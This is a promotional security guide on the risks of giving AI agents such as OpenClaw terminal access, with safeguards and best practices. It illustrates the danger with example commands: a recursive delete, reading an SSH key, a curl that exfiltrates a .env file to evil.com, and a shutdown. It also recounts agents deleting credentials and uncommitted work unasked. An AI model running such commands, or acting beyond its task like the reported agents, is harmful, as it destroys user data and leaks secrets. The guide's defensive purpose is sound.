AI Agent Security: What You Need to Know Before Giving AI Access to Your System
Your AI assistant can run any terminal command on your server. That's powerful — and dangerous. An honest guide to AI agent security: real risks, real incidents, and how to protect yourself.
AI Agent Security: What You Need to Know Before Giving AI Access to Your System
TL;DR: AI agents like OpenClaw can run terminal commands, edit files, and interact with external services. That makes them incredibly useful — and genuinely risky if you're not careful. This guide covers real incidents, current safeguards, and practical steps to protect yourself. No fear-mongering, just facts.
The Reality
Let's start with the uncomfortable truth: when you give an AI agent access to your system, you're giving it the ability to run any command your user account can run.
OpenClaw's exec tool lets the AI execute shell commands. That's how it installs packages, manages files, runs scripts, checks system status, and does the hundred other useful things that make it more than a chatbot.
But "any command" means any command:
rm -rf /home/user/important-project # Delete your work
cat ~/.ssh/id_rsa # Read your SSH keys
curl -X POST https://evil.com -d @~/.env # Exfiltrate secrets
sudo shutdown -h now # Turn off your server
The AI won't do these things on purpose. It's not malicious. But AI agents make mistakes, and mistakes with shell access have consequences.
Real Incidents
These aren't hypothetical. They're from GitHub issues and community reports.
The OAuth Credential Deletion
An OpenClaw agent was troubleshooting an authentication issue. The user asked it to "fix the auth problem." The agent's chain of reasoning went something like:
- Auth is failing → check the credentials file
- The credentials look wrong → they might be corrupted
- Delete the corrupted credentials and re-generate them
- Deleted the OAuth credentials file
- Couldn't re-generate them because it didn't have the original client secret
Result: the user had to manually re-create OAuth credentials from their provider's dashboard. Not catastrophic, but annoying and avoidable.
The Aggressive Cleanup
An agent was asked to "clean up the project directory." It interpreted this broadly:
- Removed
node_modules/(fine, can reinstall) - Removed build artifacts (fine)
- Removed
.envfile (not fine — contained API keys) - Removed uncommitted changes it considered "temporary" (definitely not fine)
The Infinite Loop
An agent was running a script that it also had permission to modify. The script hit an error, the agent "fixed" the script, which introduced a new error, which the agent "fixed" again. This went on for 47 iterations before hitting the API rate limit.
No data was lost, but the API bill was notable.
Current Safeguards
OpenClaw has some protections. Let's be honest about what exists and what doesn't.
What Exists
Exec security modes. OpenClaw supports security modes for the exec tool:
full— The AI can run any command. This is the default, and it's what most people use because it's the most capabledeny— The exec tool is disabled entirely. The AI can't run any commands. Safe but severely limits what the AI can do
AGENTS.md guardrails. The agent's instruction file tells it to prefer trash over rm, ask before destructive operations, and avoid exfiltrating data. These are behavioral guidelines — the AI follows them most of the time, but they're not enforced by code.
Sandboxing. lobsterfarm instances run in isolated environments. Even if the AI goes rogue, it can only affect its own sandbox — not other users' instances, not the host system.
File-level permissions. Standard Unix permissions apply. If the user account doesn't have access, neither does the AI.
What's Missing
No command allowlist. There's no way to say "the AI can run git and npm but not rm or curl." It's all or nothing. A granular allowlist — where you specify exactly which commands the AI can use — is a frequently requested feature that hasn't been implemented yet.
No human-in-the-loop for dangerous commands. The AI doesn't pause and ask "Should I really delete this?" for destructive operations. The AGENTS.md guidelines say it should, but there's no technical enforcement.
No audit trail (by default). OpenClaw logs AI actions, but there's no built-in dashboard that shows "here's every command your AI ran today" in a reviewable format. You can check the logs manually, but most people don't.
No rollback. If the AI deletes or modifies something, there's no automatic undo. Whatever backups you have are your safety net.
Best Practices
Here's how to reduce risk without giving up the power of an AI agent.
1. Run It on a Separate Server
This is the single most important thing you can do. Don't run your AI agent on your personal machine or your production server.
Use a dedicated VPS or a lobsterfarm instance. If the AI breaks something, it breaks a sandbox — not your laptop with 10 years of photos and your company's production database.
Cost: a Hetzner VPS is €4-8/month. That's extremely cheap insurance.
2. Back Up Regularly
Automated backups are non-negotiable. If the AI deletes something important, you need to be able to restore it.
# Simple daily backup via cron
0 3 * * * tar -czf /backup/openclaw-$(date +%Y%m%d).tar.gz /home/user/clawd/
Better yet, use a backup service that maintains multiple versions so you can restore from any point in time.
3. Review Agent Actions
Make a habit of checking what your AI has been doing. Check the logs periodically:
openclaw gateway logs | grep "exec\|tool_use"
Look for anything unexpected. Over time, you'll develop a sense of what's normal and what's not.
4. Use Version Control
Keep your workspace in a git repository. If the AI modifies files in unexpected ways, you can see exactly what changed and revert:
git diff # What changed?
git checkout -- . # Revert everything
5. Limit API Keys
Don't put your most sensitive API keys on the same server as your AI agent. If the AI needs specific API access, give it dedicated keys with minimal permissions.
For example: if the AI needs to read your calendar, give it a read-only calendar API key — not your full Google account credentials.
6. Keep AGENTS.md Tight
The instructions in AGENTS.md genuinely work — the AI reads and follows them. Add explicit rules:
## Safety Rules
- NEVER delete files without asking first
- NEVER modify .env or credential files
- NEVER run commands with sudo
- Always use `trash` instead of `rm`
- Ask before any command that touches production data
This isn't bulletproof, but it dramatically reduces accidental damage.
Running on a Managed Service
Running your AI agent on a dedicated server — whether self-hosted or managed — is inherently safer than running it on your personal machine:
- Isolation. The AI can't affect your personal files, photos, or SSH keys
- It's not your laptop. If the AI deletes something, it's on a server — not your machine with 10 years of documents
- Separation. Your AI agent has its own environment. It can't accidentally trash your personal files because they aren't there
lobsterfarm provides managed OpenClaw hosting with deployment, updates, and support. A dedicated VPS works too — the key is keeping the agent off your personal machine.
The Honest Take
AI agents are powerful tools with real risks. The current state of security in the ecosystem — not just OpenClaw, but AI agents generally — is immature. We're in the early days of figuring out how to give AI meaningful system access without meaningful system risk.
The good news: the risks are manageable. A separate server, regular backups, and periodic review of agent actions will protect you from the vast majority of issues.
The bad news: there's no silver bullet yet. Command allowlists, human-in-the-loop confirmation, and proper audit trails are all needed and not yet standard.
Use AI agents. They're genuinely transformative. But use them with your eyes open.
Skip the setup. Start using your AI assistant today.
lobsterfarm gives you a fully managed OpenClaw instance — one click, your own server, running 24/7.